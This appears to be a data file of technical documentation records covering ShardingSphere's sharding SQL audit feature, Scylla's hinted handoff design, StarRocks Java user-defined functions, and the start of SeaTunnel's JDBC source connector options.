[ { "data": "+++ title = \" ShardingSphere 5.2.0: Audit for sharding intercepts unreasonable requests in multi-shards scenarios\" weight = 76 chapter = true +++ Thanks to our continuous review of the 's community feedback that we use to develop features such as data sharding and read/write splitting, we found that some users create a large number of shards when using the data sharding feature. In such cases, there can be 1,000 physical tables corresponding to a sharding logical table, which largely disturbs users. For instance, a `SELECT * FROM t_order` statement will lead to a full-route, which is obviously not the case for . This SQL can be placed in another Proxy to avoid blocking other requests. However, if users are not familiar with Proxy, or write a `where` condition and don't know that sharding is not supported in this condition, a full-route is still required. A full route can lower the performance of Proxy and even result in the failure of a reasonable request. Imagine that there are 1000 shards in a physical database, if they are executed in parallel, 1,000 connections are needed and if in serial, the request can lead to a timeout. In this regard, community users requested whether the unreasonable request can be intercepted directly. We've considered the issue for a while. If we simply block the full-route operation, we just need to check it in the code and add a switch to the configuration file. On the other hand, if the user later needs to set a table to read-only or requires the update operation to carry a `limit`, does that mean we need to change the code and configuration again? This obviously goes against the pluggable logic of Proxy. In response to the above problems, the provides users with SQL audit for the sharding function. The audit can either be an interception operation or a statistical operation. Similar to the sharding and unique key generation algorithms, the audit algorithm is also plugin-oriented, user-defined, and configurable. Next, we will elaborate on the implementation logic for data sharding's audit, with specific SQL examples. The entrance to Apache ShardingSphere's audit is in the `org.apache.shardingsphere.infra.executor.check.SQLCheckEngine` class, which will invoke the `check` method of the `SQLChecker` interface. Currently, ShardingSphere audit contains audit for permission (verify username and password) and audit for sharding. Here we focus on the parent interface implemented in `ShardingAuditChecker` of audit for sharding. We can learn its working principles quickly through viewing the `check` code of `org.apache.shardingsphere.sharding.checker.audit.ShardingAuditChecker`. ```java public interface ShardingAuditAlgorithm extends ShardingSphereAlgorithm { / Sharding audit algorithm SQL check. * @param sqlStatementContext SQL statement context @param parameters SQL parameters @param grantee grantee @param database database @return SQL check result */ SQLCheckResult check(SQLStatementContext<?> sqlStatementContext, List<Object> parameters, Grantee grantee, ShardingSphereDatabase database); } ``` This method obtains the audit strategies of all the sharding tables involved and invokes the audit algorithms configured in each sharding table audit" }, { "data": "If an audit algorithm fails to pass, an exception is displayed to the user. Some users may wonder what `disableAuditNames` does here. The audit for sharding also allows users to skip this process. In some cases, users may need to execute SQL that should have been blocked by the audit, and they are aware of the impact of this SQL. For this reason, we provide `Hint: disableAuditNames` to skip audit interception, which will be described with practical examples later on. The Proxy Administrators can configure `allowHintDisable` to control whether to allow users to skip this process. The default value is `true`, indicating that Hint-based skip is allowed. The audit for sharding algorithm interface `org.apache.shardingsphere.sharding.spi.ShardingAuditAlgorithm` is inherited from SPI class `ShardingSphereAlgorithm`. It inherits `type` and `props` properties and defines its own `check` method. If you're looking to customize your own audit algorithm, just implement the interface and add it to `INF.services`. ```java public interface ShardingAuditAlgorithm extends ShardingSphereAlgorithm { / Sharding audit algorithm SQL check. * @param sqlStatementContext SQL statement context @param parameters SQL parameters @param grantee grantee @param database database @return SQL check result */ SQLCheckResult check(SQLStatementContext<?> sqlStatementContext, List<Object> parameters, Grantee grantee, ShardingSphereDatabase database); } ``` Apache ShardingSphere implements a general audit for sharding algorithm `org.apache.shardingsphere.sharding.algorithm.audit.DMLShardingConditionsShardingAuditAlgorithm`, namely the above-mentioned SQL statement that intercepts the full-route. The algorithm makes decisions by determining whether the sharding condition is `null`. Of course, it won't intercept broadcast tables and non-sharding tables. ```java public final class DMLShardingConditionsShardingAuditAlgorithm implements ShardingAuditAlgorithm { @Getter private Properties props; @Override public void init(final Properties props) { this.props = props; } @SuppressWarnings({\"rawtypes\", \"unchecked\"}) @Override public SQLCheckResult check(final SQLStatementContext<?> sqlStatementContext, final List<Object> parameters, final Grantee grantee, final ShardingSphereDatabase database) { if (sqlStatementContext.getSqlStatement() instanceof DMLStatement) { ShardingRule rule = database.getRuleMetaData().getSingleRule(ShardingRule.class); if (rule.isAllBroadcastTables(sqlStatementContext.getTablesContext().getTableNames()) || sqlStatementContext.getTablesContext().getTableNames().stream().noneMatch(rule::isShardingTable)) { return new SQLCheckResult(true, \"\"); } ShardingConditionEngine shardingConditionEngine = ShardingConditionEngineFactory.createShardingConditionEngine(sqlStatementContext, database, rule); if (shardingConditionEngine.createShardingConditions(sqlStatementContext, parameters).isEmpty()) { return new SQLCheckResult(false, \"Not allow DML operation without sharding conditions\"); } } return new SQLCheckResult(true, \"\"); } @Override public String getType() { return \"DMLSHARDINGCONDITIONS\"; } } ``` Here we'd like to introduce another audit for sharding algorithm: `LimitRequiredShardingAuditAlgorithm`. This algorithm can intercept SQL without carrying `limit` in the `update` and `delete` operations. As this algorithm is less universal, it is not currently integrated into Apache ShardingSphere. As you can see, it is very easy to implement a custom algorithm, which is why we need to design the audit for sharding framework. Thanks to its plugin-oriented architecture, ShardingSphere boasts great scalability. ```java public final class LimitRequiredShardingAuditAlgorithm implements ShardingAuditAlgorithm { @Getter private Properties props; @Override public void init(final Properties props) { this.props = props; } @SuppressWarnings({\"rawtypes\", \"unchecked\"}) @Override public SQLCheckResult check(final SQLStatementContext<?> sqlStatementContext, final List<Object> parameters, final Grantee grantee, final ShardingSphereDatabase database) { if (sqlStatementContext instanceof UpdateStatementContext && !((MySQLUpdateStatement) sqlStatementContext.getSqlStatement()).getLimit().isPresent()) { return new SQLCheckResult(false, \"Not allow update without limit\"); } if (sqlStatementContext instanceof DeleteStatementContext && !((MySQLDeleteStatement)" }, { "data": "{ return new SQLCheckResult(false, \"Not allow delete without limit\"); } return new SQLCheckResult(true, \"\"); } @Override public String getType() { return \"LIMIT_REQUIRED\"; } } ``` Audit for sharding requires you to configure audit strategy for logical tables. To help you quickly get started, its configuration is the same with that of the sharding algorithm and the sharding key value generator. There is an algorithm definition and strategy definition, and default audit strategy is also supported. If the audit strategy is configured in the logical table, it takes effect only for the logical table. If `defaultAuditStrategy` is configured in the logical table, it takes effect fo all the logical tables under the sharding rule. `Auditors` are similar to `ShardingAlgorithms`, `auditStrategy` to `databaseStrategy`, and `defaultAuditStrategy` to `defaultDatabaseStrategy` or `defaultTableStrategy`. Please refer to the following configuration. Only the configuration of audit for sharding is displayed. You need to configure the sharding algorithm and data source by yourself. ```sql rules: !SHARDING tables: t_order: actualDataNodes: ds${0..1}.torder_${0..1} auditStrategy: auditorNames: shardingkeyrequired_auditor allowHintDisable: true defaultAuditStrategy: auditorNames: shardingkeyrequired_auditor allowHintDisable: true auditors: shardingkeyrequired_auditor: type: DMLSHARDINGCONDITIONS ``` Step 1: Execute a query operation. An error is displayed as the audit strategy for intercepting the full-database route is configured. ```mysql mysql> select * from t_order; ERROR 13000 (44000): SQL check failed, error message: Not allow DML operation without sharding conditions ``` Step 2: Add `HINT.` The name of the `HINT` is `/ ShardingSphere hint: disableAuditNames /`and `disableAuditNames` is followed by the `auditorsNames` configured in the preceding command. If there are multiple names, separate them with spaces such as `/ ShardingSphere hint: disableAuditNames=auditName1 auditName2/`. After using `HINT`, we can see that the SQL operation is successfully executed. ```mysql mysql> / ShardingSphere hint: disableAuditNames=sharding_key_required_auditor / select * from t_order; +-+++--+ | orderid | userid | address_id | status | +-+++--+ | 30 | 20 | 10 | 20 | | 32 | 22 | 10 | 20 | +-+++--+ 2 rows in set (0.01 sec) ``` Note: If you are using MySQL terminal to connect to Proxy directly, you need to add the `-c` property otherwise, `HINT `comments will be filtered out of the MySQL terminal and will not be parsed by Proxy on the backend. ```sql props: proxy-hint-enabled: truemysql -uroot -proot -h127.0.0.1 -P3307 -c ``` Currently, as you can see from the Apache ShardingSphere 5.2.0 supports the following with audit for sharding function. ```sql CREATE SHARDING AUDITOR ALTER SHARDING AUDITOR SHOW SHARDING AUDIT ALGORITHMS ``` The following DistSQL will be supported in future releases: ```sql DROP SHARDING AUDITOR SHOW UNUSED SHARDING AUDIT ALGORITHMS CREATE SHARDING TABLE RULE # including AUDIT_STRATEGY ``` This post introduced how audit for sharding works with specific examples. I believe you already have basic understanding of this function, and you can use it whenever you need or use custom algorithm. You are also welcome to submit general algorithms to the community. If you have any ideas you'd like to contribute or you encounter any issues with your ShardingSphere, feel free to post them on . Huang Ting, a technology engineer at Financial Technology (FiT) & . He is mainly responsible for the R&D of Proxy-related audit for sharding and transaction features." } ]
{ "category": "App Definition and Development", "file_name": "hinted_handoff_design.md", "project_name": "Scylla", "subcategory": "Database" }
[ { "data": "Hinted Handoff is a feature that allows replaying failed writes. The mutation and the destination replica are saved in a log and replayed later according to the feature configuration. hintedhandoffenabled: Enables or disables the Hinted Handoff feature completely or enumerate DCs for which hints are allowed. maxhintwindowinms: Don't generate hints if the destination Node has been down for more than this value. The hints generation should resume once the Node is seen up. hintsdirectory: Directory where scylla will store hints. By default `$SCYLLAHOME/hints` hintscompression_: Compression to apply to hints files. By default, hints files are stored uncompressed. We should define the fairness configuration between the regular WRITES and hints WRITES. Since we don't have either CPU scheduler or (and) Network scheduler at the moment we can't give any guarantee regarding the runtime and/or networking bandwidth fairness. Once we have tools to define it we should give the hints sender some low runtime priority and some small share of the bandwidth. Once the WRITE mutation fails with a timeout we create a hintsqueue_ for the target node. The queue is specified by a destination node host ID. Each hint is specified by: Mutation. Destination node. Hints are appended to the hintsqueue until (all this should be done using the existing or slightly modified commitlog_ API): The destination node is DOWN for more than maxhintwindowinms time. The total size of hint files is more than 10% of the total disk partition size where hintsdirectory_ is located. We are going to ensure storing a new hint to the specific destination node if there are no pending hints to it. As long as hints are appended to the queue the files are closed and flushed to the disk once they reach the maximum allowed size (32MB) or when the queue is forcefully flushed (see \"Hints sending\" below). We are going to reuse the commitlog infrastructure for writing hints to disk - it provides both the internal buffering and the memory consumption control. Hints to the specific destination are stored under the hintsdirectory_/\\<shard ID>/\\<node host ID> directory. A new hint is going to be dropped when there are more than 10MB \"in progress\" (yet to be stored) hints per-shard and when there are \"in progress\" hints to the destination the current hint is aimed to. If there are no \"in progress\" hints to the current destination the new hint won't be dropped due to the per-shard memory limitation. A hint is going to be dropped if the disk space quota (to the whole node it's 10% of the total disk space of the disk partition where hintsdirectory_ is located) has been depleted and when there are pending (already stored) hints to the current destination. Disk quota is divided equally between all present shards. If there are no pending hints to the current destination a new hint won't be dropped due to a disk space limitation. If a new hint is dropped the corresponding metrics counter is increased. When node boots all present hints files are redistributed equally between all present shards. Hints are sent from each shard by each hintsqueue_ independently. Each shard sends the hints that it owns (according to the hint file location). Hints sending is triggered by the following events: Timer: every X seconds (every" }, { "data": "For each queue: Forcefully close the queues. If the destination node is ALIVE or decommissioned and there are pending hints to it start sending hints to it: If hint's timestamp is older than mutation.gcgraceseconds() from now() drop this hint. The hint's timestamp is evaluated as hintsfile_ last modification time minus the hints timer period (10s). Hints are sent using a MUTATE verb: Each mutation is sent in a separate message. If the node in the hint is a valid mutation replica - send the mutation to it. Otherwise execute the original mutation with CL=ALL. Once the complete hints file is processed it's deleted and we move to the next file. We are going to limit the parallelism during hints sending. The new hint is going to be sent out unless: The total size of in-flight (being sent) hints is greater or equal to 10% of the total shard memory. The number of in-flight hints is greater or equal to 128 - this is needed to limit the collateral memory consumption in case of small hints (mutations). If there is a hint that is bigger than the memory limit above we are going to send it but won't allow any additional in-flight hints while it's being sent. Local node is decommissioned (see \"When the current node is decommissioned\" below). Send all pending hints out: If the destination node is not ALIVE or the mutation times out - drop the hint and move on to the next one. Streaming is performed using a new HINT_STREAMING verb: When node is decommissioned it would stream its hints to other nodes of the cluster (only in a Local data center): Shard X would send its hints to the node[Yx], where Yx = X mod N, where N is number of nodes in the cluster without the node that is being decommissioned. Receiver distributes received hints equally among local shards: pushes them to the corresponding hintqueue_s (see \"Hints generation\" above). Scylla is moving away from using IP addresses to identify nodes in its internals and that role is being taken over by host IDs. Hinted Handoff is no exception to that and the module uses the new type now. However, to prepare for upgrading Scylla to a new version from one where Hinted Handoff still used IP addresses, a migration process has been introduced. Its purpose is to map existing hint directories on disk so that their names all represent valid host IDs. When the whole cluster starts using a version of Scylla that supports host-ID based Hinted Handoff, the module is suspended (i.e. no new hints are accepted and no hints are being sent) and we start renaming hint directories to host IDs. Hinted Handoff does NOT work until the migration process has finished. As a side effect, all sync points that were created up to then will be canceled, i.e. an exception will be issued instead of a resolved future. A major consequence of the migration process is also possible data loss. If there is no corresponding host ID for a given IP address in `locator::token_metadata` or if renaming a directory fails, the directory shall be removed with all of its contents. In that case, a warning will be issued. Migration won't be started if a node is being stopped or drained." } ]
{ "category": "App Definition and Development", "file_name": "JAVA_UDF.md", "project_name": "StarRocks", "subcategory": "Database" }
[ { "data": "displayed_sidebar: \"English\" From v2.2.0 onwards, you can compile user-defined functions (UDFs) to suit your specific business needs by using the Java programming language. From v3.0 onwards, StarRocks supports global UDFs, and you only need to include the `GLOBAL` keyword in the related SQL statements (CREATE/SHOW/DROP). This topic how to develop and use various UDFs. Currently, StarRocks supports scalar UDFs, user-defined aggregate functions (UDAFs), user-defined window functions (UDWFs), and user-defined table functions (UDTFs). You have installed , so you can create and compile Java projects. You have installed JDK 1.8 on your servers. The Java UDF feature is enabled. You can set the FE configuration item `enable_udf` to `true` in the FE configuration file fe/conf/fe.conf to enable this feature, and then restart the FE nodes to make the settings take effect. For more information, see . You need to create a Maven project and compile the UDF you need by using the Java programming language. Create a Maven project, whose basic directory structure is as follows: ```Plain project |--pom.xml |--src | |--main | | |--java | | |--resources | |--test |--target ``` Add the following dependencies to the pom.xml file: ```XML <?xml version=\"1.0\" encoding=\"UTF-8\"?> <project xmlns=\"http://maven.apache.org/POM/4.0.0\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd\"> <modelVersion>4.0.0</modelVersion> <groupId>org.example</groupId> <artifactId>udf</artifactId> <version>1.0-SNAPSHOT</version> <properties> <maven.compiler.source>8</maven.compiler.source> <maven.compiler.target>8</maven.compiler.target> </properties> <dependencies> <dependency> <groupId>com.alibaba</groupId> <artifactId>fastjson</artifactId> <version>1.2.76</version> </dependency> </dependencies> <build> <plugins> <plugin> <groupId>org.apache.maven.plugins</groupId> <artifactId>maven-dependency-plugin</artifactId> <version>2.10</version> <executions> <execution> <id>copy-dependencies</id> <phase>package</phase> <goals> <goal>copy-dependencies</goal> </goals> <configuration> <outputDirectory>${project.build.directory}/lib</outputDirectory> </configuration> </execution> </executions> </plugin> <plugin> <groupId>org.apache.maven.plugins</groupId> <artifactId>maven-assembly-plugin</artifactId> <version>3.3.0</version> <executions> <execution> <id>make-assembly</id> <phase>package</phase> <goals> <goal>single</goal> </goals> </execution> </executions> <configuration> <descriptorRefs> <descriptorRef>jar-with-dependencies</descriptorRef> </descriptorRefs> </configuration> </plugin> </plugins> </build> </project> ``` Use the Java programming language to compile a UDF. A scalar UDF operates on a single row of data and returns a single value. When you use a scalar UDF in a query, each row corresponds to a single value in the result set. Typical scalar functions include `UPPER`, `LOWER`, `ROUND`, and `ABS`. Suppose that the values of a field in your JSON data are JSON strings rather than JSON objects. When you use an SQL statement to extract JSON strings, you need to run `GETJSONSTRING` twice, for example, `GETJSONSTRING(GETJSONSTRING('{\"key\":\"{\\\\\"k0\\\\\":\\\\\"v0\\\\\"}\"}', \"$.key\"), \"$.k0\")`. To simplify the SQL statement, you can compile a scalar UDF that can directly extract JSON strings, for example, `MYUDFJSON_GET('{\"key\":\"{\\\\\"k0\\\\\":\\\\\"v0\\\\\"}\"}', \"$.key.k0\")`. ```Java package com.starrocks.udf.sample; import com.alibaba.fastjson.JSONPath; public class UDFJsonGet { public final String evaluate(String obj, String key) { if (obj == null || key == null) return null; try { // The JSONPath library can be fully expanded even if the values of a field are JSON strings. return JSONPath.read(obj, key).toString(); } catch (Exception e) { return null; } } } ``` The user-defined class must implement the method described in the following table. NOTE The data types of the request parameters and return parameters in the method must be the same as those declared in the `CREATE FUNCTION` statement that is to be executed in and conform to the mapping that is provided in the \"\" section of this topic. | Method | Description | | -- | | | TYPE1 evaluate(TYPE2, ...) | Runs the" }, { "data": "The evaluate() method requires the public member access level. | A UDAF operates on multiple rows of data and returns a single value. Typical aggregate functions include `SUM`, `COUNT`, `MAX`, and `MIN`, which aggregate multiple rows of data specified in each GROUP BY clause and return a single value. Suppose that you want to compile a UDAF named `MYSUMINT`. Unlike the built-in aggregate function `SUM`, which returns BIGINT-type values, the `MYSUMINT` function supports only request parameters and returns parameters of the INT data type. ```Java package com.starrocks.udf.sample; public class SumInt { public static class State { int counter = 0; public int serializeLength() { return 4; } } public State create() { return new State(); } public void destroy(State state) { } public final void update(State state, Integer val) { if (val != null) { state.counter+= val; } } public void serialize(State state, java.nio.ByteBuffer buff) { buff.putInt(state.counter); } public void merge(State state, java.nio.ByteBuffer buffer) { int val = buffer.getInt(); state.counter += val; } public Integer finalize(State state) { return state.counter; } } ``` The user-defined class must implement the methods described in the following table. NOTE The data types of the request parameters and return parameters in the methods must be the same as those declared in the `CREATE FUNCTION` statement that is to be executed in and conform to the mapping that is provided in the \"\" section of this topic. | Method | Description | | | | | State create() | Creates a state. | | void destroy(State) | Destroys a state. | | void update(State, ...) | Updates a state. In addition to the first parameter `State`, you can also specify one or more request parameters in the UDF declaration. | | void serialize(State, ByteBuffer) | Serializes a state into the byte buffer. | | void merge(State, ByteBuffer) | Deserializes a state from the byte buffer, and merges the byte buffer into the state as the first parameter. | | TYPE finalize(State) | Obtains the final result of the UDF from a state. | During compilation, you must also use the buffer class `java.nio.ByteBuffer` and the local variable `serializeLength`, which are described in the following table. | Class and local variable | Description | | | | | java.nio.ByteBuffer() | The buffer class, which stores intermediate results. Intermediate results may be serialized or deserialized when they are transmitted between nodes for execution. Therefore, you must also use the `serializeLength` variable to specify the length that is allowed for the deserialization of intermediate results. | | serializeLength() | The length that is allowed for the deserialization of intermediate results. Unit: bytes. Set this local variable to an INT-type value. For example, `State { int counter = 0; public int serializeLength() { return 4; }}` specifies that intermediate results are of the INT data type and the length for deserialization is 4 bytes. You can adjust these settings based on your business" }, { "data": "For example, if you want to specify the data type of intermediate results as LONG and the length for deserialization as 8 bytes, pass `State { long counter = 0; public int serializeLength() { return 8; }}`. | Take note of the following points for the deserialization of intermediate results stored in the `java.nio.ByteBuffer` class: The remaining() method that is dependent on the `ByteBuffer` class cannot be called to deserialize a state. The clear() method cannot be called on the `ByteBuffer` class. The value of `serializeLength` must be the same as the length of the written-in data. Otherwise, incorrect results are generated during serialization and deserialization. Unlike regular aggregate functions, a UDWF operates on a set of multiple rows, which are collectively called a window, and returns a value for each row. A typical window function includes an `OVER` clause that divides rows into multiple sets. It performs a calculation across each set of rows and returns a value for each row. Suppose that you want to compile a UDWF named `MYWINDOWSUMINT`. Unlike the built-in aggregate function `SUM`, which returns BIGINT-type values, the `MYWINDOWSUMINT` function supports only request parameters and returns parameters of the INT data type. ```Java package com.starrocks.udf.sample; public class WindowSumInt { public static class State { int counter = 0; public int serializeLength() { return 4; } @Override public String toString() { return \"State{\" + \"counter=\" + counter + '}'; } } public State create() { return new State(); } public void destroy(State state) { } public void update(State state, Integer val) { if (val != null) { state.counter+=val; } } public void serialize(State state, java.nio.ByteBuffer buff) { buff.putInt(state.counter); } public void merge(State state, java.nio.ByteBuffer buffer) { int val = buffer.getInt(); state.counter += val; } public Integer finalize(State state) { return state.counter; } public void reset(State state) { state.counter = 0; } public void windowUpdate(State state, int peergroupstart, int peergroupend, int framestart, int frameend, Integer[] inputs) { for (int i = (int)framestart; i < (int)frameend; ++i) { state.counter += inputs[i]; } } } ``` The user-defined class must implement the method required by UDAFs (because a UDWF is a special aggregate function) and the windowUpdate() method described in the following table. NOTE The data types of the request parameters and return parameters in the method must be the same as those declared in the `CREATE FUNCTION` statement that is to be executed in and conform to the mapping that is provided in the \"\" section of this topic. | Method | Description | | -- | | | void windowUpdate(State state, int, int, int , int, ...) | Updates the data of the window. For more information about UDWFs, see . Every time when you enter a row as input, this method obtains the window information and updates intermediate results accordingly.<ul><li>`peergroupstart`: the start position of the current partition. `PARTITION BY` is used in the OVER clause to specify a partition column. Rows with the same values in the partition column are considered to be in the same partition.</li><li>`peergroupend`: the end position of the current partition.</li><li>`framestart`: the start position of the current window" }, { "data": "The window frame clause specifies a calculation range, which covers the current row and the rows that are within a specified distance to the current row. For example, `ROWS BETWEEN 1 PRECEDING AND 1 FOLLOWING` specifies a calculation range that covers the current row, the previous row before the current row, and the following row after the current row.</li><li>`frameend`: the end position of the current window frame.</li><li>`inputs`: the data that is entered as the input to a window. The data is an array package that supports only specific data types. In this example, INT values are entered as input, and the array package is Integer[].</li></ul> | A UDTF reads one row of data and returns multiple values that can be considered to be a table. Table-valued functions are typically used to transform rows into columns. NOTE StarRocks allows a UDTF to return a table that consists of multiple rows and one column. Suppose that you want to compile a UDTF named `MYUDFSPLIT`. The `MYUDFSPLIT` function allows you to use spaces as delimiters and supports request parameters and return parameters of the STRING data type. ```Java package com.starrocks.udf.sample; public class UDFSplit{ public String[] process(String in) { if (in == null) return null; return in.split(\" \"); } } ``` The method defined by the user-defined class must meet the following requirements: NOTE The data types of the request parameters and return parameters in the method must be the same as those declared in the `CREATE FUNCTION` statement that is to be executed in and conform to the mapping that is provided in the \"\" section of this topic. | Method | Description | | - | -- | | TYPE[] process() | Runs the UDTF and returns an array. | Run the following command to package the Java project: ```Bash mvn package ``` The following JAR files are generated in the target folder: udf-1.0-SNAPSHOT.jar and udf-1.0-SNAPSHOT-jar-with-dependencies.jar. Upload the JAR file udf-1.0-SNAPSHOT-jar-with-dependencies.jar to an HTTP server that keeps up and running and is accessible to all FEs and BEs in your StarRocks cluster. Then, run the following command to deploy the file: ```Bash mvn deploy ``` You can set up a simple HTTP server by using Python and upload the JAR file to that HTTP server. NOTE In , the FEs will check the JAR file that contains the code for the UDF and calculate the checksum, and the BEs will download and execute the JAR file. StarRocks allows you to create UDFs in two types of namespaces: database namespaces and global namespaces. If you do not have visibility or isolation requirements for a UDF, you can create it as a global UDF. Then, you can reference the global UDF by using the function name without including the catalog and database names as prefixes to the function name. If you have visibility or isolation requirements for a UDF, or if you need to create the same UDF in different databases, you can create it in each individual" }, { "data": "As such, if your session is connected to the target database, you can reference the UDF by using the function name. If your session is connected to a different catalog or database other than the target database, you need to reference the UDF by including the catalog and database names as prefixes to the function name, for example, `catalog.database.function`. NOTICE Before you create and use a global UDF, you must contact the system administrator to grant you the required permissions. For more information, see . After you upload the JAR package, you can create UDFs in StarRocks. For a global UDF, you must include the `GLOBAL` keyword in the creation statement. ```sql CREATE FUNCTION function_name (arg_type [, ...]) RETURNS return_type PROPERTIES (\"key\" = \"value\" [, ...]) ``` | Parameter | Required | Description | | - | -- | | | GLOBAL | No | Whether to create a global UDF, supported from v3.0. | | AGGREGATE | No | Whether to create a UDAF or UDWF. | | TABLE | No | Whether to create a UDTF. If both `AGGREGATE` and `TABLE` are not specified, a Scalar function is created. | | functionname | Yes | The name of the function you want to create. You can include the name of the database in this parameter, for example,`db1.myfunc`. If `function_name` includes the database name, the UDF is created in that database. Otherwise, the UDF is created in the current database. The name of the new function and its parameters cannot be the same as an existing name in the destination database. Otherwise, the function cannot be created. The creation succeeds if the function name is the same but the parameters are different. | | arg_type | Yes | Argument type of the function. The added argument can be represented by `, ...`. For the supported data types, see .| | return_type | Yes | The return type of the function. For the supported data types, see . | | PROPERTIES | Yes | Properties of the function, which vary depending on the type of the UDF to create. | Run the following command to create the scalar UDF you have compiled in the preceding example: ```SQL CREATE [GLOBAL] FUNCTION MYUDFJSON_GET(string, string) RETURNS string PROPERTIES ( \"symbol\" = \"com.starrocks.udf.sample.UDFJsonGet\", \"type\" = \"StarrocksJar\", \"file\" = \"http://httphost:httpport/udf-1.0-SNAPSHOT-jar-with-dependencies.jar\" ); ``` | Parameter | Description | | | | | symbol | The name of the class for the Maven project to which the UDF belongs. The value of this parameter is in the `<packagename>.<classname>` format. | | type | The type of the UDF. Set the value to `StarrocksJar`, which specifies that the UDF is a Java-based function. | | file | The HTTP URL from which you can download the JAR file that contains the code for the UDF. The value of this parameter is in the `http://<httpserverip>:<httpserverport>/<jarpackagename>` format. | Run the following command to create the UDAF you have compiled in the preceding example: ```SQL CREATE [GLOBAL] AGGREGATE FUNCTION MYSUMINT(INT) RETURNS INT PROPERTIES ( \"symbol\" = \"com.starrocks.udf.sample.SumInt\", \"type\" = \"StarrocksJar\", \"file\" =" }, { "data": "); ``` The descriptions of the parameters in PROPERTIES are the same as those in . Run the following command to create the UDWF you have compiled in the preceding example: ```SQL CREATE [GLOBAL] AGGREGATE FUNCTION MYWINDOWSUM_INT(Int) RETURNS Int properties ( \"analytic\" = \"true\", \"symbol\" = \"com.starrocks.udf.sample.WindowSumInt\", \"type\" = \"StarrocksJar\", \"file\" = \"http://httphost:httpport/udf-1.0-SNAPSHOT-jar-with-dependencies.jar\" ); ``` `analytic`: Whether the UDF is a window function. Set the value to `true`. The descriptions of other properties are the same as those in . Run the following command to create the UDTF you have compiled in the preceding example: ```SQL CREATE [GLOBAL] TABLE FUNCTION MYUDFSPLIT(string) RETURNS string properties ( \"symbol\" = \"com.starrocks.udf.sample.UDFSplit\", \"type\" = \"StarrocksJar\", \"file\" = \"http://httphost:httpport/udf-1.0-SNAPSHOT-jar-with-dependencies.jar\" ); ``` The descriptions of the parameters in PROPERTIES are the same as those in . After you create the UDF, you can test and use it based on your business needs. Run the following command to use the scalar UDF you have created in the preceding example: ```SQL SELECT MYUDFJSON_GET('{\"key\":\"{\\\\\"in\\\\\":2}\"}', '$.key.in'); ``` Run the following command to use the UDAF you have created in the preceding example: ```SQL SELECT MYSUMINT(col1); ``` Run the following command to use the UDWF you have created in the preceding example: ```SQL SELECT MYWINDOWSUM_INT(intcol) OVER (PARTITION BY intcol2 ORDER BY intcol3 ROWS BETWEEN UNBOUNDED PRECEDING AND UNBOUNDED FOLLOWING) FROM test_basic; ``` Run the following command to use the UDTF you have created in the preceding example: ```Plain -- Suppose that you have a table named t1, and the information about its columns a, b, and c1 is as follows: SELECT t1.a,t1.b,t1.c1 FROM t1; output: 1,2.1,\"hello world\" 2,2.2,\"hello UDTF.\" -- Run the MYUDFSPLIT() function. SELECT t1.a,t1.b, MYUDFSPLIT FROM t1, MYUDFSPLIT(t1.c1); output: 1,2.1,\"hello\" 1,2.1,\"world\" 2,2.2,\"hello\" 2,2.2,\"UDTF.\" ``` NOTE The first `MYUDFSPLIT` in the preceding code snippet is the alias of the column that is returned by the second `MYUDFSPLIT`, which is a function. You cannot use `AS t2(f1)` to specify the aliases of the table and its columns that are to be returned. Run the following command to query UDFs: ```SQL SHOW [GLOBAL] FUNCTIONS; ``` For more information, see . Run the following command to drop a UDF: ```SQL DROP [GLOBAL] FUNCTION <functionname>(argtype [, ...]); ``` For more information, see . | SQL TYPE | Java TYPE | | -- | -- | | BOOLEAN | java.lang.Boolean | | TINYINT | java.lang.Byte | | SMALLINT | java.lang.Short | | INT | java.lang.Integer | | BIGINT | java.lang.Long | | FLOAT | java.lang.Float | | DOUBLE | java.lang.Double | | STRING/VARCHAR | java.lang.String | Configure the following environment variable in the be/conf/be.conf file of each Java virtual machine (JVM) in your StarRocks cluster to control memory usage. If you use JDK 8, configure `JAVAOPTS`. If you use JDK 9 or later, configure `JAVAOPTSFORJDK9AND_LATER`. ```Bash JAVA_OPTS=\"-Xmx12G\" JAVAOPTSFORJDK9ANDLATER=\"-Xmx12G\" ``` Can I use static variables when I create UDFs? Do the static variables of different UDFs have mutual impacts on each other? Yes, you can use static variables when you compile UDFs. The static variables of different UDFs are isolated from each other and do not affect each other even if the UDFs have classes with identical names." } ]
{ "category": "App Definition and Development", "file_name": "Jdbc.md", "project_name": "SeaTunnel", "subcategory": "Streaming & Messaging" }
[ { "data": "JDBC source connector Read external data source data through JDBC. :::tip Warn: for license compliance, you have to provide database driver yourself, copy to `$SEATNUNNEL_HOME/lib/` directory in order to make them work. e.g. If you use MySQL, should download and copy `mysql-connector-java-xxx.jar` to `$SEATNUNNELHOME/lib/`. For Spark/Flink, you should also copy it to `$SPARKHOME/jars/` or `$FLINK_HOME/lib/`. ::: You need to ensure that the has been placed in directory `${SEATUNNEL_HOME}/plugins/`. You need to ensure that the has been placed in directory `${SEATUNNEL_HOME}/lib/`. supports query SQL and can achieve projection effect. | name | type | required | default value | |--|--|-|--| | url | String | Yes | - | | driver | String | Yes | - | | user | String | No | - | | password | String | No | - | | query | String | No | - | | compatible_mode | String | No | - | | connectionchecktimeout_sec | Int | No | 30 | | partition_column | String | No | - | | partitionupperbound | Long | No | - | | partitionlowerbound | Long | No | - | | partition_num | Int | No | job parallelism | | fetch_size | Int | No | 0 | | properties | Map | No | - | | table_path | String | No | - | | table_list | Array | No | - | | where_condition | String | No | - | | split.size | Int | No | 8096 | | split.even-distribution.factor.lower-bound | Double | No | 0.05 | | split.even-distribution.factor.upper-bound | Double | No | 100 | | split.sample-sharding.threshold | Int | No | 1000 | | split.inverse-sampling.rate | Int | No | 1000 | | common-options | | No | - | The jdbc class name used to connect to the remote data source, if you use MySQL the value is `com.mysql.cj.jdbc.Driver`. userName password The URL of the JDBC connection. Refer to a case: jdbc:postgresql://localhost/test Query statement The compatible mode of database, required when the database supports multiple compatible modes. For example, when using OceanBase database, you need to set it to 'mysql' or 'oracle'. The time in seconds to wait for the database operation used to validate the connection to complete. For queries that return a large number of objects, you can configure the row fetch size used in the query to improve performance by reducing the number database hits required to satisfy the selection criteria. Zero means use jdbc default value. Additional connection configuration parameters,when properties and URL have the same parameters, the priority is determined by the <br/>specific implementation of the driver. For example, in MySQL, properties take precedence over the URL. The path to the full path of table, you can use this configuration instead of `query`. examples: mysql: \"testdb.table1\" oracle: \"test_schema.table1\" sqlserver: \"testdb.test_schema.table1\" postgresql: \"testdb.test_schema.table1\" iris: \"test_schema.table1\" The list of tables to be read, you can use this configuration 